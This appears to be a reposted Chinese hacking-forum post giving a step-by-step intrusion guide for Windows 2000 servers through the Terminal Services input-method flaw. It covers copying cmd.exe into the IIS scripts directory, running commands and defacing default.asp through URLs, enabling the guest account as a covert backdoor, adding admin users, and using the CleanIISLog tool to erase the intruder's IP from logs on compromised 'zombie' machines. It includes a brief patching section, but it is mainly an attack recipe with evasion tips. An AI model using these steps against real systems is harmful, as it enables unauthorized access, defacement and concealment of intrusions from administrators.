12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:) 注意事项: 1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你! 2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。 3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx……:( 个人观点: 1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等; 2.url的跳转下,你将拥有超级用户的权限,好好利用吧:) 3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:) 4.此法似乎与对方的防火墙无关哦! 堵漏办法: 1.打补丁; 2.删掉全拼输入法,用标准就成了嘛^^; 3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^) 问题(高手请赐教): 1.如果IE下的www访问需要密码,怎办? 2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功! 3.如果对方139 port不开,有什么办法打开吗?w2k server中怎样控制139端口? 88了,小女子要走了,衷心希望各位高手、Cool GG不要对小女子保守哦,没人帮助的自学好艰苦!:(( Homepage;elise.51.net [email protected] QQ:[7175215] windows2000的终端服务程序是以图开界面远程访问主机的3389端口,而微软的windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远程入侵一台主机。 1、用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。 2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。 3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。 4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。 5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe. 6、选择"保存到磁盘"。 7、选择目录:c:\inetpub\scripts\ 8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧) 9、输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp 这是一个简单的例子,同志们可别用来对付国内的站点,因为这样的漏洞实在太多。 这个也是我转来得 呵呵上面讲的很详细了 好好看呀 第一个很实际可行的呵呵 呵呵 3389 我的最爱 要是漏洞都想这个这么好找好用就好了 下面是什么 呢? 呵呵就 SQL 我建议大家看 流光的帮助 SQL使用说明 上面太详细了 要不我怎么说流光好呢 帮助都那样的傻瓜 还有就是关于IIS5.0 的益出 这个呀还是看帮助对了小榕网站的说明比自带的帮助还要好理解:P 在别处还有别的IIS5.0益出的程序大家可以好好看看 呵呵用中英文的还有日语什么的都全了 原理差不多 小榕新出的 嗅探器很不错的呵呵 没事可以试试的呵呵 对了安全第一呀 呵呵 小榕早给我们准备好了 就是哪个可以删除指定ip的 程序 可以该名用的 CleanIISLog ReadMe CleanIISLog是一个清除IIS LOG记录的工具,和其他工具相比有以下不同点: 1、可以清除指定的的IP连接记录,保留其他IP记录。 2、当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。 用法: CleanIISLog | | : 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件 (注意:处理所有日志文件需要很长的时间)。 : 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不 推荐这样做)。 CleanIISLog只能在本地运行,而且必须具有Administrators权限。 比如把CleanIISLog该名成 MDJY 命令就 mdjy . **.**.**.** 呵呵 当然是要是在肉鸡上运行呀 呵呵还必须是Administrators权限 其实这些都是皮毛 很多的还是要我门自己活学活用的 上面有很多的错字和没有标点的地方还请大家见量呵呵 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|